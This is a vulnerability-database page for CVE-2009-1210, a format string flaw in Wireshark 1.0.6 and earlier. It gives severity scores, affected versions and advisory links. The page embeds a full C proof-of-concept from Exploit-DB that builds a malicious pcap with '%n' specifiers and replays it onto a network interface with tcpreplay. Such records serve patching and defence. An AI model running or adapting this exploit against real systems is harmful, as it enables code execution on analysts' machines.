CVE-2009-1210 : Detail

CVE-2009-1210

35.42%V4
Network
2009-04-01
08h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Format string vulnerability in the PROFINET/DCP (PN-DCP) dissector in Wireshark 1.0.6 and earlier allows remote attackers to execute arbitrary code via a PN-DCP packet with format string specifiers in the station name. NOTE: some of these details are obtained from third party information.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-134 Use of Externally-Controlled Format String
The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8308

Publication date : 2009-03-29 22h00 +00:00
Author : THCX Labs
EDB Verified : Yes

/* ################## THCX ####################################### # Wireshark <= 1.0.6 PN-DCP format string bug POC ############################################################### # [!] autore: THCX Labs # [!] PN-DCP eithor standalone or tunneld thru DCE/RPC # [!] local open of pcapfile also working ############################################################### */ #include <stdio.h> #include <stdlib.h> #include <errno.h> char sploit[]= "\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00" "\x96\x2c\x8f\x47\x97\xaa\x0d\x00\x22\x00\x00\x00\x22\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80" "\xc8\x38\xa4\x8b\x81\x00\x00\x00\x88\x92\xfe\xfe\x05\x00\x01\x00\x00\x01\x00\x01\x00\x04\xff\xff" "\x00\x00\x96\x2c\x8f\x47\x96\xae\x0d\x00\xd6\x00\x00\x00\xd6\x00\x00\x00\x00\x80\xc8\x38\xa4\x8b" "\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xff\x05\x01\x01\x00\x00\x01\x00\x00\x00\xb8" "\x02\x05\x00\x10\x00\x00\x02\x01\x02\x02\x02\x03\x02\x04\x02\x05\x01\x01\x01\x02\x02\x01\x00\x0a" "\x00\x00\x53\x37\x2d\x33\x30\x30\x45\x43\x02\x02\x00\x6e\x00\x00\x25\x6e\x25\x6e\x25\x6e\x20\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x02\x03\x00\x06\x00\x00\x00\x2a\x01\x01\x02\x04\x00\x04\x00\x00\x02\x00\x01\x02" "\x00\x0e\x00\x01\xc0\xa8\x00\x0b\xff\xff\xff\x00\xc0\xa8\x00\x0b\x97\x2c\x8f\x47\xf2\xd0\x0e\x00" "\x32\x00\x00\x00\x32\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80\xc8\x38\xa4\x8b\x81\x00\x00\x00" "\x88\x92\xfe\xfd\x04\x00\x01\x00\x00\x01\x00\x00\x00\x14\x02\x02\x00\x09\x00\x01\x25\x6e\x25\x6e" "\x25\x6e\x20\x00\x05\x02\x00\x02\x00\x00\x97\x2c\x8f\x47\x82\xd2\x0e\x00\x40\x00\x00\x00\x40\x00" "\x00\x00\x00\x80\xc8\x38\xa4\x8b\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xfd\x04\x01" "\x01\x00\x00\x01\x00\x00\x00\x10\x05\x04\x00\x03\x02\x02\x00\x00\x05\x04\x00\x03\x05\x02\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; int main(){ FILE *fh; int r; fh=fopen("formatstringbug.pcap","wb"); if(!fh){perror("no open");exit(1);} fwrite(sploit,sizeof sploit,1,fh); fclose(fh); r=system("tcpreplay -i eth0 formatstringbug.pcap"); return 0; } // milw0rm.com [2009-03-30]

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version To (including) 1.0.5

Wireshark>>Wireshark >> Version 0.6

    Wireshark>>Wireshark >> Version 0.7.9

      Wireshark>>Wireshark >> Version 0.8.16

        Wireshark>>Wireshark >> Version 0.8.19

          Wireshark>>Wireshark >> Version 0.9.5

            Wireshark>>Wireshark >> Version 0.9.7

              Wireshark>>Wireshark >> Version 0.9.8

                Wireshark>>Wireshark >> Version 0.9.10

                  Wireshark>>Wireshark >> Version 0.9.14

                    Wireshark>>Wireshark >> Version 0.10

                      Wireshark>>Wireshark >> Version 0.10.1

                      Wireshark>>Wireshark >> Version 0.10.2

                        Wireshark>>Wireshark >> Version 0.10.3

                          Wireshark>>Wireshark >> Version 0.10.4

                            Wireshark>>Wireshark >> Version 0.10.5

                              Wireshark>>Wireshark >> Version 0.10.6

                                Wireshark>>Wireshark >> Version 0.10.7

                                  Wireshark>>Wireshark >> Version 0.10.8

                                    Wireshark>>Wireshark >> Version 0.10.9

                                      Wireshark>>Wireshark >> Version 0.10.10

                                        Wireshark>>Wireshark >> Version 0.10.11

                                          Wireshark>>Wireshark >> Version 0.10.12

                                            Wireshark>>Wireshark >> Version 0.10.13

                                              Wireshark>>Wireshark >> Version 0.10.14

                                                Wireshark>>Wireshark >> Version 0.99

                                                  Wireshark>>Wireshark >> Version 0.99.0

                                                    Wireshark>>Wireshark >> Version 0.99.1

                                                      Wireshark>>Wireshark >> Version 0.99.2

                                                      Wireshark>>Wireshark >> Version 0.99.3

                                                      Wireshark>>Wireshark >> Version 0.99.4

                                                      Wireshark>>Wireshark >> Version 0.99.5

                                                      Wireshark>>Wireshark >> Version 0.99.6

                                                      Wireshark>>Wireshark >> Version 0.99.6a

                                                        Wireshark>>Wireshark >> Version 0.99.7

                                                        Wireshark>>Wireshark >> Version 0.99.8

                                                        Wireshark>>Wireshark >> Version 1.0

                                                          Wireshark>>Wireshark >> Version 1.0.0

                                                          Wireshark>>Wireshark >> Version 1.0.1

                                                          Wireshark>>Wireshark >> Version 1.0.2

                                                          Wireshark>>Wireshark >> Version 1.0.3

                                                          Wireshark>>Wireshark >> Version 1.0.4

                                                          References

                                                          http://www.securityfocus.com/bid/34291
                                                          Tags : vdb-entry, x_refsource_BID
                                                          http://secunia.com/advisories/35464
                                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                                          http://www.redhat.com/support/errata/RHSA-2009-1100.html
                                                          Tags : vendor-advisory, x_refsource_REDHAT
                                                          http://secunia.com/advisories/34778
                                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                                          https://www.exploit-db.com/exploits/8308
                                                          Tags : exploit, x_refsource_EXPLOIT-DB
                                                          http://secunia.com/advisories/34970
                                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                                          http://www.debian.org/security/2009/dsa-1785
                                                          Tags : vendor-advisory, x_refsource_DEBIAN
                                                          http://secunia.com/advisories/35133
                                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                                          http://secunia.com/advisories/35416
                                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                                          http://secunia.com/advisories/34542
                                                          Tags : third-party-advisory, x_refsource_SECUNIA
                                                          http://www.mandriva.com/security/advisories?name=MDVSA-2009:088
                                                          Tags : vendor-advisory, x_refsource_MANDRIVA
                                                          http://secunia.com/advisories/35224
                                                          Tags : third-party-advisory, x_refsource_SECUNIA